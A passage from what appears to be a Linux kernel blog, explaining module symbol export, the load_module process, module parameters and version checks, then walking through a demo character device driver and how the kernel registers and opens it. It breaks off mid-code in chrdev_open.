This shows the EXPORT_SYMBOL definition. Though seems complicated, we will uses our example to instantiate it. Think our EXPORT_SYMBOL(testexport). After expand this macro, we get this(the __CRC_SYMBOL(sym, sec) is left later):

static const char __kstrtab_testexport[] = "testexport";
const struct kernel_symbol __ksymtab_testexport =
{(unsigned long)&testexport, __kstrtab_testexport}
The second structure represented:
struct kernel_symbol
{
unsigned long value;
const char *name;
};

So here we can see, the EXPORT_SYMBOL just define variables, the ‘value’ is the address of this symbol in memory and ‘name’ is the name of this symbol. Not like ordinary defination, the export function’s name is stored in section “__ksymtab_strings”, and the kernel_symbol variable is stored in section “___ksymtab+testexport”. If you look at the ELF file section, you will not find “___ksymtab+testexport” section. It is converted in “__ksymtab” in <scripts/module-common.lds>:

SECTIONS {
/DISCARD/ : { *(.discard) }

__ksymtab  : { *(SORT(___ksymtab+*)) }
__ksymtab_gpl  : { *(SORT(___ksymtab_gpl+*)) }
__ksymtab_unused : { *(SORT(___ksymtab_unused+*)) }
__ksymtab_unused_gpl : { *(SORT(___ksymtab_unused_gpl+*)) }
__ksymtab_gpl_future : { *(SORT(___ksymtab_gpl_future+*)) }
__kcrctab  : { *(SORT(___kcrctab+*)) }
__kcrctab_gpl  : { *(SORT(___kcrctab_gpl+*)) }
__kcrctab_unused : { *(SORT(___kcrctab_unused+*)) }
__kcrctab_unused_gpl : { *(SORT(___kcrctab_unused_gpl+*)) }
__kcrctab_gpl_future : { *(SORT(___kcrctab_gpl_future+*)) }
}

As for EXPORT_SYMBOL_GPL and EXPORT_SYMBOL_GPL_FUTURE, the only difference is the section added by “_gpl” and “_gpl_future”. In order to let the kernel uses these sections to find the exported symbol, the linker must export the address of these section. See <include/asm-generic/vmlinux.lds.h>:

/* Kernel symbol table: Normal symbols */   \
__ksymtab         : AT(ADDR(__ksymtab) - LOAD_OFFSET) {  \
  VMLINUX_SYMBOL(__start___ksymtab) = .;   \
  *(SORT(___ksymtab+*))     \
  VMLINUX_SYMBOL(__stop___ksymtab) = .;   \
}        \
        \
/* Kernel symbol table: GPL-only symbols */   \
__ksymtab_gpl     : AT(ADDR(__ksymtab_gpl) - LOAD_OFFSET) { \
  VMLINUX_SYMBOL(__start___ksymtab_gpl) = .;  \
  *(SORT(___ksymtab_gpl+*))    \
  VMLINUX_SYMBOL(__stop___ksymtab_gpl) = .;  \
}        \
        \
/* Kernel symbol table: Normal unused symbols */  \
__ksymtab_unused  : AT(ADDR(__ksymtab_unused) - LOAD_OFFSET) { \
  VMLINUX_SYMBOL(__start___ksymtab_unused) = .;  \
  *(SORT(___ksymtab_unused+*))    \
  VMLINUX_SYMBOL(__stop___ksymtab_unused) = .;  \
}        \
...

In <kernel/module.c> we can see the declaration:

/* Provided by the linker */
extern const struct kernel_symbol __start___ksymtab[];
extern const struct kernel_symbol __stop___ksymtab[];
extern const struct kernel_symbol __start___ksymtab_gpl[];
extern const struct kernel_symbol __stop___ksymtab_gpl[];
extern const struct kernel_symbol __start___ksymtab_gpl_future[];
extern const struct kernel_symbol __stop___ksymtab_gpl_future[];

So after this, the kernel can use ‘__start___ksymtab’ and other variables without any errorsNow let’s talk more about the ELF file about section “__ksymtab”. Firstly dump this section:

# readelf --hex-dump=_ksymtab hello.ko
readelf: Warning: Section '_ksymtab' was not dumped because it does not exist!
# readelf --hex-dump=__ksymtab hello.ko

Hex dump of section '__ksymtab':
NOTE: This section has relocations against it, but these have NOT been applied to this dump.
  0x00000000 00000000 00000000 00000000 00000000 ................

Interesting, they are all zeros! Where is our data. If you look the section headers more carefully, you can see some sections begin with “.rela”. There is a ‘.rela__ksymtab’ section:

# readelf -S hello.ko
There are 33 section headers, starting at offset 0x45ab8:

Section Headers:
  [Nr] Name              Type             Address           Offset
      Size              EntSize          Flags  Link  Info  Align
  [ 0]                   NULL             0000000000000000  00000000
      0000000000000000  0000000000000000           0     0     0
  [ 1] .note.gnu.build-i NOTE             0000000000000000  00000040
      0000000000000024  0000000000000000   A       0     0     4
  [ 2] .text             PROGBITS         0000000000000000  00000070
      0000000000000051  0000000000000000  AX       0     0     16
  [ 3] .rela.text        RELA             0000000000000000  00025be8
      00000000000000d8  0000000000000018   I      30     2     8
  [ 4] __ksymtab         PROGBITS         0000000000000000  000000d0
      0000000000000010  0000000000000000   A       0     0     16
  [ 5] .rela__ksymtab    RELA             0000000000000000  00025cc0
      0000000000000030  0000000000000018   I      30     4     8
  [ 6] __kcrctab         PROGBITS         0000000000000000  000000e0
      0000000000000008  0000000000000000   A       0     0     8
  [ 7] .rela__kcrctab    RELA             0000000000000000  00025cf0

‘.rela__ksymtab’ section’s type is RELA. This means this section contains relocation data which data will be and how to be modified when the final executable is loaded to kernel. section of ‘.rela__ksymtab’ contains the ‘__ksymtab’ relocation data.

# readelf  -r hello.ko | head -20

Relocation section '.rela.text' at offset 0x25be8 contains 9 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000000001  001f00000002 R_X86_64_PC32     0000000000000000 __fentry__ - 4
000000000008  00050000000b R_X86_64_32S      0000000000000000 .rodata.str1.1 + 0
00000000000d  002400000002 R_X86_64_PC32     0000000000000000 printk - 4
000000000021  001f00000002 R_X86_64_PC32     0000000000000000 __fentry__ - 4
000000000028  00050000000b R_X86_64_32S      0000000000000000 .rodata.str1.1 + f
00000000002d  002400000002 R_X86_64_PC32     0000000000000000 printk - 4
000000000041  001f00000002 R_X86_64_PC32     0000000000000000 __fentry__ - 4
000000000048  00050000000b R_X86_64_32S      0000000000000000 .rodata.str1.1 + 1f
00000000004d  002400000002 R_X86_64_PC32     0000000000000000 printk - 4

Relocation section '.rela__ksymtab' at offset 0x25cc0 contains 2 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000000000  002300000001 R_X86_64_64       0000000000000000 testexport + 0
000000000008  000600000001 R_X86_64_64       0000000000000000 __ksymtab_strings + 0

Relocation section '.rela__kcrctab' at offset 0x25cf0 contains 1 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend

Here we can see in section ‘.rela__ksymtab’ there is 2 entries. I will not dig into the RELA section format, just notice the 0x23 and 0x06 is used to index the .symtab section. So when the .ko is loaded into the kernel, the first 8 bytes of section ‘__ksymtab’ will be replaced by the actual address of testexport, and the second 8 bytes of section ‘__ksymtab’ will be replaced by the actual address of the string at ‘__ksymtab_strings+0’ which is ‘testexport’. So this is what the structure kernel_symbol—through EXPORT_SYMBOL—does.

Module load process

init_module system call is used to load the kernel module to kernel. User space application loads the .ko file into user space and then pass the address and size of .ko and the arguments of the kernel module will use to this system call. In init_module, it just allocates the memory space and copys the user’s data to kernel, then call the actual work function load_module. In general we can split the load_module function up to two logical part. The first part completes the load work such as reallocation the memory to hold kernel module, resolve the symbol, apply relocations and so on. The second part later do other work such as call the module’s init function, cleanup the allocated resource and so on. Before we go to the first part, let’s first look at a very important structure ‘struct module’: <include/linux/module.h>

struct module {
enum module_state state;

/* Member of list of modules */
struct list_head list;

/* Unique handle for this module */
char name[MODULE_NAME_LEN];

/* Sysfs stuff. */
struct module_kobject mkobj;
struct module_attribute *modinfo_attrs;
const char *version;
const char *srcversion;
struct kobject *holders_dir;

/* Exported symbols */
const struct kernel_symbol *syms;
const unsigned long *crcs;
unsigned int num_syms;

/* Kernel parameters. */
struct kernel_param *kp;
unsigned int num_kp;
...
}

Here I just list some of the fields of ‘struct module’, it represents a module in kernel, contains the infomation of the kernel module. For example, ‘state’ indicates the status of the module, it will change with the load process, the ‘list’ links all of the modules in kernel and ‘name’ contains the module name. Below lists some important function the load_module calls.

load_module
  -->layout_and_allocate
    -->setup_load_info
      -->rewrite_section_headers
    -->layout_sections
    -->layout_symtab
    -->move_module
  -->find_module_sections
  -->simplify_symbols
  -->apply_relocations
  -->parse_args
  -->do_init_module

The rewrite_section_headers function replace the sections header field ‘sh_addr’ with the real address in the memory. Then in function setup_load_info, ‘mod’ is initialized with the “.gnu.linkonce.this_module” section’s real address. Actually, this contains the data compiler setup for us. In the source directory, we can see a hello.mod.c file:

__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
    .name = KBUILD_MODNAME,
    .init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
    .exit = cleanup_module,
#endif
    .arch = MODULE_ARCH_INIT,
};

So here we can see the ‘mod’ will have some field. The interesting here is that we can see the init function is init_module, not the same as our hello_init. The magic is caused by module_init as follows(include/linux/init.h):

/* Each module must use one module_init(). */
#define module_init(initfn)     \
static inline initcall_t __inittest(void)  \
{ return initfn; }     \
int init_module(void) __attribute__((alias(#initfn)));

From here we can see the compiler will set the ‘init_module’s alias to our init function name which is ‘hello_init’ in our example. Next in the function ‘layout_sections’, it will caculate the ‘core’ size and ‘init’ size of the ELF file. Then according where define the CONFIG_KALLSYMS, ‘layout_symtab’ will be called and the symbol info will be added to the core section. After caculate the core and init section, it will allocate space for core and init section in function ‘move_module’ and then copy the origin section data to the new space. So the sections’s sh_addr should also be updated. Then the ‘mod’s address should be updated.

mod = (void *)info->sechdrs[info->index.mod].sh_addr;

                    core section
                    +------------+ <-----mod->module_core
                +-> |            |
                |   +------------+
+------------+ +---> |            |
| ELF header | | |   +------------+
+------------+ | |   |            |
| section 0  +---+   +------------+
+------------+ |
| section 1  +----+
+------------+ |  |  init section
| section 2  +----+  +------------+ <-----mod->module_init
+------------+ | +-> |            |
| section 3  +-+ |   +------------+
+------------+   +-> |           ||
|sec head table      +------------+
+------------+       |            |
                    |            |
                    +------------+

So for now , we have this section.

Later ‘load_module’ call ‘find_module_sections’ to get the export symbol. Next, it calls ‘simplify_symbols’ to fix up the symbols. The function call chain is simplify_symbols–>resolve_symbol_wait–> –>resolve_symbol–>find_symbol–>each_symbol_section In the last function, it will first iterate the kernel’s export symbol and then iterate the loaded modules symbol. If ‘resolve_symbol’ successful, it will call ‘ref_module’ to establish the dependency between current load module and the module of the symbol it uses. This is done in ‘add_module_usage’

static int add_module_usage(struct module *a, struct module *b)
{
struct module_use *use;

pr_debug("Allocating new usage for %s.\n", a->name);
use = kmalloc(sizeof(*use), GFP_ATOMIC);
if (!use) {
  pr_warn("%s: out of memory loading\n", a->name);
  return -ENOMEM;
}

use->source = a;
use->target = b;
list_add(&use->source_list, &b->source_list);
list_add(&use->target_list, &a->target_list);
return 0;
}

Here a is current loading module, and b is the module a uses its symbol. module->source_list links the modules depend on module, and module->target_list links the modules it depends on.

After fix up the symbols, the ‘load_module’ function will do relocation by calling function ‘apply_relocations’. If the section’s type is ‘SHT_REL’ or ‘SHT_RELA’, function ‘apply_relocations’ will call the arch-spec function. As the symbol table has been solved, this relocation is much simple. So now the module’s export symbol address has been corrected the right value.

Next the ‘load_module’ function will call ‘parse_args’ to parse module parameters. Let’s first look at how to define parameter in kernel module.

static bool __read_mostly fasteoi = 1;
module_param(fasteoi, bool, S_IRUGO);

#define module_param(name, type, perm)    \
module_param_named(name, name, type, perm)

#define module_param_named(name, value, type, perm)      \
param_check_##type(name, &(value));       \
module_param_cb(name, &param_ops_##type, &value, perm);     \
__MODULE_PARM_TYPE(name, #type)

#define module_param_cb(name, ops, arg, perm)          \
__module_param_call(MODULE_PARAM_PREFIX, name, ops, arg, perm, -1, 0)

#define __module_param_call(prefix, name, ops, arg, perm, level, flags) \
/* Default value instead of permissions? */   \
static const char __param_str_##name[] = prefix #name; \
static struct kernel_param __moduleparam_const __param_##name \
__used        \
    __attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_##name, ops, VERIFY_OCTAL_PERMISSIONS(perm), \
    level, flags, { arg } }

Let’s try an example using the ‘fasteoi’.

param_check_bool(fasteoi, &(fasteoi));
static const char __param_str_bool[] = "fasteoi";
static struct kernel_param __moduleparam_const __param_fasteoi \
__used
    __attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
  = { __param_str_fasteoi, param_ops_bool, VERIFY_OCTAL_PERMISSIONS(perm), \
    -1, 0, { &fasteoi} }

So here we can see ‘module_param(fasteoi, bool, S_IRUGO);’ define a variable which is ‘struct kernel_param’ and store it in section ‘__param’.

struct kernel_param {
const char *name;
const struct kernel_param_ops *ops;
u16 perm;
s8 level;
u8 flags;
union {
  void *arg;
  const struct kparam_string *str;
  const struct kparam_array *arr;
};
};

the union ‘arg’ will contain the kernel parameter’s address.

The user space will pass the specific arguments to load_module in the ‘uargs’ argument. In ‘parse_args’, it will pass one by one parameter, and compare it will the data in section ‘__param’ , and then write it will the user specific value.

int param_set_bool(const char *val, const struct kernel_param *kp)
{
/* No equals means "set"... */
if (!val) val = "1";

/* One of =[yYnN01] */
return strtobool(val, kp->arg);
}
int strtobool(const char *s, bool *res)
{
switch (s[0]) {
case 'y':
case 'Y':
case '1':
  *res = true;
  break;
case 'n':
case 'N':
case '0':
  *res = false;
  break;
default:
  return -EINVAL;
}
return 0;
}

Version control

One thing we have lost is version control. Version control is used to keep consistency between kernel and module. We can’t load modules compiled for 2.6 kernel into 3.2 kernel. That’s why version control needed. Kernel and module uses CRC checksum to do this. The idea behind this is so easy, the build tools will generate CRC checksum for every exported function and for every function module reference. Then in ‘load_module’ function, these two CRC will be checked if there are the same. In order to support this mechism, the kernel config must contain ‘CONFIG_MODVERSIONS’. In EXPORT_SYMBOL macro, there is a __CRC_SYMBOL definition.

#ifdef CONFIG_MODVERSIONS
/* Mark the CRC weak since genksyms apparently decides not to
* generate a checksums for some symbols */
#define __CRC_SYMBOL(sym, sec)     \
extern __visible void *__crc_##sym __attribute__((weak));  \
static const unsigned long __kcrctab_##sym  \
__used       \
__attribute__((section("___kcrctab" sec "+" #sym), unused)) \
= (unsigned long) &__crc_##sym;
#else
#define __CRC_SYMBOL(sym, sec)
#endif

Expand it.

extern __visible void *__crc_textexport;
static const unsigned long __kcrctab_testexport = (unsigned long) &__crc_textexport;

So for every export symbol, build tools will generate a CRC checksum and store it in section ‘_kcrctab’.

The time for module load process. In hello.mod.c we can see the below:

static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
    { 0x21fac097, __VMLINUX_SYMBOL_STR(module_layout) },
    { 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
    { 0xbdfb6dbb, __VMLINUX_SYMBOL_STR(__fentry__) },
};

struct modversion_info {
unsigned long crc;
char name[MODULE_NAME_LEN];
};

The ELF will have an array of struct modversion stored in section ‘__versions’, and every element in this array have a crc and name to indicate the module references symbol.

In ‘check_version’, when it finds the symbole it will call ‘check_version’. Function ‘check_version’ iterates the ‘__versions’ and compare the finded symble’s CRC checksum. If it is the same, it passes the check.

Modinfo

.ko file will also contain a ‘.modinfo’ section which stores some of the module information. modinfo program can show these info. In the source code, one can use ‘MODULE_INFO’ to add this information.

#define MODULE_INFO(tag, info) __MODULE_INFO(tag, tag, info)

#ifdef MODULE
#define __MODULE_INFO(tag, name, info)       \
static const char __UNIQUE_ID(name)[]       \
  __used __attribute__((section(".modinfo"), unused, aligned(1)))   \
  = __stringify(tag) "=" info
#else  /* !MODULE */
/* This struct is here for syntactic coherency, it is not used */
#define __MODULE_INFO(tag, name, info)       \
  struct __UNIQUE_ID(name) {}
#endif

MODULE_INFO just define a key-value data in ‘.modinfo’ section once the MODULE is defined. MODULE_INFO is used several places, such as license, vermagic:

#define MODULE_LICENSE(_license) MODULE_INFO(license, _license)

/*
* Author(s), use "Name <email>" or just "Name", for multiple
* authors use multiple MODULE_AUTHOR() statements/lines.
*/
#define MODULE_AUTHOR(_author) MODULE_INFO(author, _author)

/* What your module does. */
#define MODULE_DESCRIPTION(_description) MODULE_INFO(description, _description)

MODULE_INFO(vermagic, VERMAGIC_STRING);

vermagic

vermagic is a string generated by kernel configuration information. ‘load_module’ will check this in ‘layout_and_allocate’->’check_modinfo’->’same_magic’. ‘VERMAGIC_STRING’ is generated by the kernel configuration.

#define VERMAGIC_STRING        \
UTS_RELEASE " "       \
MODULE_VERMAGIC_SMP MODULE_VERMAGIC_PREEMPT     \
MODULE_VERMAGIC_MODULE_UNLOAD MODULE_VERMAGIC_MODVERSIONS \
MODULE_ARCH_VERMAGI

After doing the tough work, ‘load_module’ goes to the final work to call ‘do_init_module’. If the module has an init function, ‘do_init_module’ will call it in function ‘do_one_initcall’. Then change the module’s state to ‘MODULE_STATE_LIVE’, and call the function registered in ‘module_notify_list’ list and finally free the INIT section of module.

Unload module

Unload module is quite easy, it is done by syscall ‘delete_module’, which takes only the module name argument. First find the module in modules list and then check whether it is depended by other modules then call module exit function and finally notify the modules who are interested module unload by iterates ‘module_notify_list’.

Anatomy of the Linux character devices

2018-06-02T00:00:00+00:00

Character device is one of the class of Linux devices. The coordinative devices contain block devices, network devices. Every class of devices has its own support infrastructure by kernel, often called device driver model. This article will disscuss the simple character devices model.

First we need prepare a simple character device driver and user program using it.

    root@debian986:~# cat demo_chr_dev.c
    #include <linux/module.h>
    #include <linux/kernel.h>
    #include <linux/fs.h>
    #include <linux/cdev.h>

    static struct cdev chr_dev;
    static dev_t ndev;

    static int chr_open(struct inode *nd, struct file *filp)
    {
        int major = MAJOR(nd->i_rdev);
        int minor = MINOR(nd->i_rdev);
        printk("chr_open, major = %d, minor = %d\n", major, minor);
        return 0;
    }

    static ssize_t chr_read(struct file *f, char __user *u, loff_t *off)
    {
        printk("In the chr_read() function\n");
        return 0;
    }

    struct file_operations chr_ops = 
    {
        .owner = THIS_MODULE,
        .open = chr_open,
        .read = chr_read,
    };

    static int demo_init(void)
    {
        int ret;
        cdev_init(&chr_dev, &chr_ops);
        ret = alloc_chrdev_region(&ndev, 0, 1, "chr_dev");
        if(ret < 0)
            return ret;
        printk("demo_init():major = %d, minor = %d\n",MAJOR(ndev), MINOR(ndev));
        ret = cdev_add(&chr_dev, ndev, 1);
        if(ret < 0)
            return ret;
        return 0;
    }

    static void demo_exit(void)
    {
        printk("Removing chr_dev module...\n");
        cdev_del(&chr_dev);
        unregister_chrdev(ndev, 1);
    }

    module_init(demo_init);
    module_exit(demo_exit);

    MODULE_LICENSE("GPL");

    root@debian986:~# cat Makefile 
    obj-m := demo_chr_dev.o
    KERNELDIR := /lib/modules/$(shell uname -r)/build
    PWD := $(shell pwd)

    default:
        $(MAKE) -C $(KERNELDIR) M=$(PWD) modules

    clean:
        rm -f *.o *.ko *.mod.c

The userspace program:

    root@debian986:~# cat main.c 
    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>

    #define CHR_DEV_NAME "/dev/chr_dev"

    int main()
    {
        int ret;
        char buf[32];
        int fd = open(CHR_DEV_NAME, O_RDONLY | O_NDELAY);
        if(fd < 0)
        {
        printf("open file %s failed\n", CHR_DEV_NAME);
            return -1;
        }
        read(fd, buf, 32);
        close(fd);
        return 0;
    }

First install the ko, using dmesg we can the major and minor number of the device.

    [  917.528480] demo_init():major = 249, minor = 0

Then we using maknod to create an entry in /dev directory:

    root@debian986:~# mknod /dev/chr_dev c 249 0

Now we have a chracter device, and run the main program, dmesg can show the open and read function has been executed.

    [  978.055050] chr_open, major = 249, minor = 0
    [  978.055055] In the chr_read() function

character device abstract

Linux kernel uses struct ‘cdev’ to represent charater devices.

    //<include/linux/cdev.h>
    struct cdev {
        struct kobject kobj;
        struct module *owner;
        const struct file_operations *ops;
        struct list_head list;
        dev_t dev;
        unsigned int count;
    };

The most import field hereis ‘struct file_operations’ which define the interface to virtual file system, when the user program trigger system call like open/read/write, it will finally go to the function which ops defines.

‘dev’ here represent the device number containing major and minor.

‘list’ links all of the character devices in the system. cdev’s initialization:

    //<fs/char_dev.c>
    void cdev_init(struct cdev *cdev, const struct file_operations *fops)
    {
        memset(cdev, 0, sizeof *cdev);
        INIT_LIST_HEAD(&cdev->list);
        kobject_init(&cdev->kobj, &ktype_cdev_default);
        cdev->ops = fops;
    }

device number

Every device has a device number which was combined of major and minor number. Major number is used to indicate device driver major for indicate which device of the same class device.

‘dev_t’ is used to represent a device number, it is 32 unsigned bit.

    //<include/linux/types.h>
    typedef __u32 __kernel_dev_t;

    typedef __kernel_fd_set		fd_set;
    typedef __kernel_dev_t		dev_t;

Its’ high 12 bits represents major number and low 20 bits represents minor number

    //<include/linux/kdev_t.h>
    #define MINORBITS	20

    #define MAJOR(dev)	((unsigned int) ((dev) >> MINORBITS))
    #define MINOR(dev)	((unsigned int) ((dev) & MINORMASK))

device number can be allocated by two function

    register_chrdev_region
    alloc_chrdev_region

The kernel uses ‘chrdevs’ global variable to manage device number’s allocation

static struct char_device_struct {
    struct char_device_struct *next;
    unsigned int major;
    unsigned int baseminor;
    int minorct;
    char name[64];
    struct cdev *cdev;		/* will die */
} *chrdevs[CHRDEV_MAJOR_HASH_SIZE];

‘register_chrdev_region’ records the device number in the chrdevs array.

    int register_chrdev_region(dev_t from, unsigned count, const char *name)
    {
        struct char_device_struct *cd;
        dev_t to = from + count;
        dev_t n, next;

        for (n = from; n < to; n = next) {
            next = MKDEV(MAJOR(n)+1, 0);
            if (next > to)
                next = to;
            cd = __register_chrdev_region(MAJOR(n), MINOR(n),
                    next - n, name);
            if (IS_ERR(cd))
                goto fail;
        }
        return 0;
    fail:
        to = n;
        for (n = from; n < to; n = next) {
            next = MKDEV(MAJOR(n)+1, 0);
            kfree(__unregister_chrdev_region(MAJOR(n), MINOR(n), next - n));
        }
        return PTR_ERR(cd);
    }

The really work is done by ‘__register_chrdev_region’, which takes a major number and counts of the major. In this function, it insert the dev_t in the chrdevs’s entry. Of course we first need get the index:

    i = major_to_index(major);

Then ‘__register_chrdev_region’ check if the new added entry has conflicts with the already exists. If not added it in the chrdevs entry. After two 2 and 257 major number inserted:

        +------------------+
    0  |                  |
        +------------------+
    1  |                  |          struct char_device_struct
        +------------------+
    2  |                  +-------> +---------------+---> +---------------+
        +------------------+         |   next        |     |   next        |
        |                  |         +---------------+     +---------------+
        |                  |         |   major=2     |     |  major=257    |
        |                  |         +---------------+     +---------------+
        |                  |         | baseminor=0   |     | baseminor=0   |
        |                  |         +---------------+     +---------------+
        |                  |         |  minorct=1    |     |  minorct=4    |
        |                  |         +---------------+     +---------------+
        |                  |         |  "augdev"     |     |  "devmodev"   |
        |                  |         +---------------+     +---------------+
        +------------------+
    254  |                  |
        +------------------+

‘alloc_chrdev_region’ is different with ‘register_chrdev_region’ is that the former hints the kernel to allocate a usable major number instead of specifying one in the later. It iterates chrdevs from last and find and empty entry to return as the major number.

character device registration

After initializing the char device and allocating the device number, we need register this char device to system. It is done by ‘cdev_add’ function.

    int cdev_add(struct cdev *p, dev_t dev, unsigned count)
    {
        int error;

        p->dev = dev;
        p->count = count;

        error = kobj_map(cdev_map, dev, count, NULL,
                exact_match, exact_lock, p);
        if (error)
            return error;

        kobject_get(p->kobj.parent);

        return 0;
    }

Quite simple, the ‘p’ is the device which need added, the ‘dev’ is the device number, and count is the number of devices.

The core is to call kobj_map. ‘kobj_map’ adds the char device to a global variable ‘cdev_map’s hash table. ‘cdev_map’ is defined:

    static struct kobj_map *cdev_map;

    struct kobj_map {
        struct probe {
            struct probe *next;
            dev_t dev;
            unsigned long range;
            struct module *owner;
            kobj_probe_t *get;
            int (*lock)(dev_t, void *);
            void *data;
        } *probes[255];
        struct mutex *lock;
    };

Here ‘probes’ field is liked the ‘chrdevs’ array, every entry represent a class of devices. The same value mod 255 is in the same entry.

    int kobj_map(struct kobj_map *domain, dev_t dev, unsigned long range,
            struct module *module, kobj_probe_t *probe,
            int (*lock)(dev_t, void *), void *data)
    {
        unsigned n = MAJOR(dev + range - 1) - MAJOR(dev) + 1;
        unsigned index = MAJOR(dev);
        unsigned i;
        struct probe *p;

        if (n > 255)
            n = 255;

        p = kmalloc(sizeof(struct probe) * n, GFP_KERNEL);

        if (p == NULL)
            return -ENOMEM;

        for (i = 0; i < n; i++, p++) {
            p->owner = module;
            p->get = probe;
            p->lock = lock;
            p->dev = dev;
            p->range = range;
            p->data = data;
        }
        mutex_lock(domain->lock);
        for (i = 0, p -= n; i < n; i++, p++, index++) {
            struct probe **s = &domain->probes[index % 255];
            while (*s && (*s)->range < range)
                s = &(*s)->next;
            p->next = *s;
            *s = p;
        }
        mutex_unlock(domain->lock);
        return 0;
    }

‘kobj_map’ first allocates a probe and then insert to one of the ‘cdev_map’s probes entry. Below show after calling ‘cdev_add’ by two major satisfied major%255 = 2.

                +------------------+
            0  |                  |
                +------------------+
            1  |                  |          struct probe
                +------------------+
            2  |                  +-------> +-------------------> +---------------+
                +------------------+         |  next         |     |  next         |
                |                  |         +---------------+     +---------------+
    probes[255]|                  |         |  dev          |     |               |
                |                  |         +---------------+     +---------------+
                |                  |         |               |     |               |
                |                  |         +---------------+     +---------------+
                |                  |         |    locak      |     |               |
                |                  |         +---------------+     +---------------+
                |                  |         |    data       +--+  |    data       |
                |                  |         +---------------+  |  +---------------+
                +------------------+                            |
        254  |                  |                            v
                +------------------+                            +--------------+
                                                                |              |
                                                                +--------------+
                                                                |              |
                                                                +--------------+
                                                                |              |
                                                                +--------------+
                                                                |              |
                                                                +--------------+
                                                                struct cdev

After calling ‘cdev_add’, the char device has been added to the system. The system can find our char device if needed. Before our user program can call user char device driver’s function, we need make a node in VFS so bridge the program and device driver.

make device file node

Device file is used to make a bridge between userspace program and kernel driver. As we know in Linux everything is a file, so if we want to export the driver’s service to user program, we must make an entry in VFS. We call mknod program in userspace will finally issues a ‘mknod’ system call. The the kernel will allocate an inode in the filesystem. For now, we will just consider the how to connect the VFS and char device driver and emit the VFS connect to the specific filesystem. The ‘vfs_mknod’ calls the specific filesystem’s mknod function.

    int vfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
    {
        int error = may_create(dir, dentry);

        if (error)
            return error;

        if ((S_ISCHR(mode) || S_ISBLK(mode)) && !capable(CAP_MKNOD))
            return -EPERM;

        if (!dir->i_op->mknod)
            return -EPERM;

        error = devcgroup_inode_mknod(mode, dev);
        if (error)
            return error;

        error = security_inode_mknod(dir, dentry, mode, dev);
        if (error)
            return error;

        error = dir->i_op->mknod(dir, dentry, mode, dev);
        if (!error)
            fsnotify_create(dir, dentry);
        return error;
    }

We will uses shmem filesystem as an example, the inode operationgs is ‘shmem_dir_inode_operations’. So it calls ‘shmem_mknod’.

    static int
    shmem_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
    {
        struct inode *inode;
        int error = -ENOSPC;

        inode = shmem_get_inode(dir->i_sb, dir, mode, dev, VM_NORESERVE);
        if (inode) {
            error = simple_acl_create(dir, inode);
            if (error)
                goto out_iput;
            error = security_inode_init_security(inode, dir,
                                &dentry->d_name,
                                shmem_initxattrs, NULL);
            if (error && error != -EOPNOTSUPP)
                goto out_iput;

            error = 0;
            dir->i_size += BOGO_DIRENT_SIZE;
            dir->i_ctime = dir->i_mtime = CURRENT_TIME;
            d_instantiate(dentry, inode);
            dget(dentry); /* Extra count - pin the dentry in core */
        }
        return error;
    out_iput:
        iput(inode);
        return error;
    }

In ‘shmem_get_inode’, it allocates a new inode which represent our new create device, /dev/chr_dev for example. As our file is a char, it is special, so the ‘init_special_inode’ is called.

    void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
    {
        inode->i_mode = mode;
        if (S_ISCHR(mode)) {
            inode->i_fop = &def_chr_fops;
            inode->i_rdev = rdev;
        } else if (S_ISBLK(mode)) {
            inode->i_fop = &def_blk_fops;
            inode->i_rdev = rdev;
        } else if (S_ISFIFO(mode))
            inode->i_fop = &pipefifo_fops;
        else if (S_ISSOCK(mode))
            inode->i_fop = &bad_sock_fops;
        else
            printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
                    " inode %s:%lu\n", mode, inode->i_sb->s_id,
                    inode->i_ino);
    }

This function’s work is to set the inode’s field ‘i_fop’ and ‘i_rdev’. Char device’s ‘i_fop’ is set to ‘def_chr_fops’:

    const struct file_operations def_chr_fops = {
        .open = chrdev_open,
        .llseek = noop_llseek,
    };

The VFS and device driver is connected by ‘inode->i_rdev’ now.

Char device’s operation

For now, the user program can open our device and issues system call like open/write/read.

do_sys_open –>do_filp_open –>path_openat –>do_last –>vfs_open –>do_dentry_open

After a long call chain, we arrive ‘do_dentry_open’ function:

    static int do_dentry_open(struct file *f,
                struct inode *inode,
                int (*open)(struct inode *, struct file *),
                const struct cred *cred)
    {
        static const struct file_operations empty_fops = {};
        int error;

        f->f_mode = OPEN_FMODE(f->f_flags) | FMODE_LSEEK |
                    FMODE_PREAD | FMODE_PWRITE;

        path_get(&f->f_path);
        f->f_inode = inode;
        f->f_mapping = inode->i_mapping;

        ...

        /* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
        if (S_ISREG(inode->i_mode))
            f->f_mode |= FMODE_ATOMIC_POS;

        f->f_op = fops_get(inode->i_fop);
        if (unlikely(WARN_ON(!f->f_op))) {
            error = -ENODEV;
            goto cleanup_all;
        }

        ...

        if (!open)
            open = f->f_op->open;
        if (open) {
            error = open(inode, f);
            if (error)
                goto cleanup_all;
        }
        ...
    }

For now the ‘inode’ is our create ‘/dev/chr_dev’ file. We assign ‘inode->i_fop’ to ‘f->f_op’. As we know:

    inode->i_fop = &def_chr_fops;

So f->f_op = &def_chr_fops

Later, it will call f_op->open, which is ‘chrdev_open’:

    static int chrdev_open(struct inode *inode, struct file *filp)
    {
        const struct file_operations *fops;
        struct cdev *p;
        struct cdev *new = NULL;
        int ret = 0;

        spin_lock(&cdev_lock);
        p = inode->i_cdev;
        if (!p) {
            struct kobject *kobj;
            int idx;
            spin_unlock(&cdev_lock);
            kobj = kobj_lookup(cdev_map, inode->i_rdev, &idx);
            if (!kobj)
                return -ENXIO;
            new = container_of(kobj, struct cdev, kobj);
            spin_lock(&cdev_lock);
            /* Check i_cdev again in case somebody beat us to it while
            we dropped the lock. */
            p = inode->i_cdev;
            if (!p) {
                inode->i_cdev = p = new;
                list_add(&inode->i_devices, &p->list);
